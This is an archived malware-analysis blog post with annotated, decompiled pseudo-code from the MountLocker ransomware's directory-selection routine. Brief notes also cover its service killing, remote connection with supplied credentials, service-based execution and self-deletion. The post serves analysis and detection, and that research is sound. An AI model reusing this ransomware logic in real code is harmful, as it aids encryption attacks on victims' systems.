[QuickNote] MountLocker – Some pseudo-code snippets Published: 2021-08-04 · Archived: 2026-04-05 22:57:07 UTC

+ Kill services, if service name contains any string is "SQL", "database", "msexchange" :

/*
 * Decompiled (IDA-style) directory filter from the MountLocker locker.
 * Decides whether the directory described by stru_offset/target_info is
 * processed further or skipped, and logs the decision with a
 * "locker.dir.check" line.
 *
 * Return value (as observed from the log strings on each path):
 *   0  -> "[SKIP]" paths: name matches the ignored-folder list, name is a
 *         ProgramData/ProgramFiles/SQL directory (when neither g_target nor
 *         g_fullpd_flag is set), the directory is a UNC path carrying a
 *         reparse point, or the reparse target contains ":\".
 *   1  -> "[OK]" paths (plain directory, or reparse point whose target is
 *         "hidden"), and every "[WARN]" path (open / FSCTL / unknown tag
 *         failure).  The caller presumably treats 1 as "descend/encrypt"
 *         and 0 as "leave alone" -- not visible here, confirm against caller.
 *
 * Side effects: increments dword_140013350 once per call and
 * dword_140013354 on most skip paths (the UNC-share skip bypasses that
 * counter, see below).  Writes reparse data into target_info through
 * reparse_point_data (an alias of target_info->target_ransom_note_name).
 *
 * NOTE(review): the fixed log strings ("[SKIP] locker.dir.check > ...",
 * "[OK] locker.dir.check > ...") are stable artifacts of this sample and
 * are useful as detection / triage strings; whether the log ever leaves
 * the console depends on f_ml_write_format_string_to_log_file_or_console,
 * which is not shown here.
 */
__int64 __fastcall f_ml_check_folder_in_ignored_list_and_log_info(
        __int64 *stru_offset,
        ml_target_info *target_info)
{
  REPARSE_DATA_BUFFER *reparse_point_data;
  const WCHAR *ptr_ignored_folder_list;
  const WCHAR *target_name;
  __int64 i;
  const wchar_t *black_list_info;
  HANDLE hFile;
  __int64 win32_err_code;
  const wchar_t *err_log_str;
  BOOL ret;
  __int64 v14;
  char *v15;
  DWORD BytesReturned;

  /* The reparse buffer is NOT separately allocated: a field of target_info
     is reused as scratch space.  DeviceIoControl below is told it is 0x4000
     bytes (MAXIMUM_REPARSE_DATA_BUFFER_SIZE); the real size of
     target_ransom_note_name is not visible here -- TODO confirm in the
     struct definition, otherwise this is an overflow waiting to happen. */
  reparse_point_data = (REPARSE_DATA_BUFFER *)&target_info->target_ransom_note_name;
  _InterlockedAdd(&dword_140013350, 1u);           // stat: directories examined
  ptr_ignored_folder_list = g_ignored_folder_list;
  target_name = CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)->target_name;
  i = 0i64;

  /* g_ignored_folder_list is walked as a NULL-terminated array of wide
     strings; a case-insensitive *substring* match anywhere in the full
     path is enough to skip the directory. */
  while ( ptr_ignored_folder_list )
  {
    if ( StrStrIW(target_name, ptr_ignored_folder_list) )
    {
      black_list_info = L"[SKIP] locker.dir.check > black_list name=%s\r\n";
LABEL_10:
      _InterlockedAdd(&dword_140013354, 1u);       // stat: directories skipped
log_info:
      f_ml_write_format_string_to_log_file_or_console(1, black_list_info, target_name);
      return 0i64;
    }
    ptr_ignored_folder_list = (&g_ignored_folder_list)[++i];
  }

  /* When either global flag is set the ProgramData/ProgramFiles/SQL check
     is bypassed entirely and the per-target "full" flag is cleared.  The
     globals look like parsed command-line switches (the page mentions
     /NODEL-style arguments) -- presumably /TARGET and /FULLPD, not
     verifiable from this snippet. */
  if ( g_target || g_fullpd_flag )
  {
    target_info->encrypt_target_of_full_flag = 0;
  }
  else if ( f_ml_check_folder_name_is_ProgramData_ProgramFiles_SQL(stru_offset, target_info) )
  {
    black_list_info = L"[SKIP] locker.dir.check > no sql program dir name=%s\r\n";
    goto LABEL_10;
  }

  /* Ordinary directory (no reparse point attribute from FindFirst/NextFile):
     accept immediately without opening it. */
  if ( !(CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)->lpFindData.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) )
  {
    f_ml_write_format_string_to_log_file_or_console(1, L"[OK] locker.dir.check > name=%s\r\n", target_name);
    return 1i64;
  }

  /* Reparse point: open the reparse point itself, not its target.
       0x80      = FILE_READ_ATTRIBUTES
       7         = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE
       0x2200400 = FILE_FLAG_BACKUP_SEMANTICS (needed to open a directory)
                 | FILE_FLAG_OPEN_REPARSE_POINT (do not follow the link)
                 | FILE_ATTRIBUTE_REPARSE_POINT
     Any open failure is logged as [WARN] but still returns 1. */
  hFile = CreateFileW(target_name, 0x80u, 7u, 0i64, OPEN_EXISTING, 0x2200400u, 0i64);
  if ( hFile == (HANDLE)INVALID_HANDLE_VALUE )
  {
    win32_err_code = GetLastError();
    err_log_str = L"[WARN] locker.dir.check > open error=%u name=%s\r\n";
log_error:
    f_ml_write_format_string_to_log_file_or_console(1, err_log_str, win32_err_code, target_name);
    return 1i64;
  }

  /* Read the raw REPARSE_DATA_BUFFER; the handle is closed before the
     result is checked, so no leak on the failure path. */
  ret = DeviceIoControl(hFile, FSCTL_GET_REPARSE_POINT, 0i64, 0, reparse_point_data, 0x4000u, &BytesReturned, 0i64);
  CloseHandle(hFile);
  if ( !ret )
  {
    win32_err_code = GetLastError();
    err_log_str = L"[WARN] locker.dir.check > get_reparse_point error=%u name=%s\r\n";
    goto log_error;
  }

  /* v14 = byte offset of PathBuffer inside REPARSE_DATA_BUFFER:
       0x10 -> MountPointReparseBuffer   (8-byte header + 4 USHORT offsets/lengths)
       0x14 -> SymbolicLinkReparseBuffer (same, plus a 4-byte Flags field)
     Only junctions/mount points and symlinks are handled; every other tag
     (e.g. WSL, OneDrive/cloud-files, dedup) is logged as unknown_tag and
     the directory is still accepted (return 1 via log_error). */
  if ( reparse_point_data->ReparseTag == IO_REPARSE_TAG_MOUNT_POINT )
  {
    v14 = 0x10i64;
  }
  else
  {
    if ( reparse_point_data->ReparseTag != IO_REPARSE_TAG_SYMLINK )
    {
      win32_err_code = reparse_point_data->ReparseTag;
      err_log_str = L"[WARN] locker.dir.check > unknown_tag tag=%0.8X name=%s\r\n";
      goto log_error;
    }
    v14 = 0x14i64;
  }

  /* NOTE(review): v15 points at the start of PathBuffer.  The code never
     applies SubstituteNameOffset/PrintNameOffset and never consults
     ReparseDataLength, so it silently assumes the substitute name sits at
     offset 0 and is NUL-terminated within the buffer -- true for the
     common "\??\C:\..." layout, not guaranteed in general. */
  v15 = (char *)reparse_point_data + v14;

  /* This test is on the directory's own path (target_name), not on the
     reparse target: a UNC path ("\\server\...") that is NOT "\\?\"-prefixed
     and carries a reparse point is skipped.  It jumps to log_info, so
     unlike the other skips it does not bump dword_140013354. */
  if ( *target_name == '\\'
    && CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)->target_name[1] == '\\'
    && CONTAINING_RECORD(stru_offset, ml_target_detail, num_targets)->target_name[2] != '?' )
  {
    black_list_info = L"[SKIP] locker.dir.check > reparse_point_into_share name=%s\r\n";
    goto log_info;
  }

  /* Reparse target containing ":\" (a drive-letter path) is "visible":
     skipped, presumably because that location is reached by the normal
     drive walk anyway and following it would double-encrypt -- inference,
     not stated in the code.  Anything else (e.g. a volume GUID mount
     point) is "hidden" and is accepted for traversal. */
  if ( StrStrIW((PCWSTR)((char *)reparse_point_data + v14), L":\\") )
  {
    _InterlockedAdd(&dword_140013354, 1u);
    f_ml_write_format_string_to_log_file_or_console(1, L"[SKIP] locker.dir.check > target_visibled target=%s name=%s\r\n", v15, target_name);
    return 0i64;
  }
  f_ml_write_format_string_to_log_file_or_console(1, L"[OK] locker.dir.check > target_hidden target=%s name=%s\r\n", v15, target_name);
  return 1i64;
}

…. and skipped folder name is:

+ Use WNetAddConnection2W to make a connection to remote target PC by using the provided username and password arg:

+ Execute payload through a service. After completing the encryption process on the victim machine, it updates log statistics:

Malware checks the /NODEL argument. If this value is 0 , it will delete itself.

Source: https://kienmanowar.wordpress.com/2021/08/04/quicknote-mountlocker-some-pseudo-code-snippets/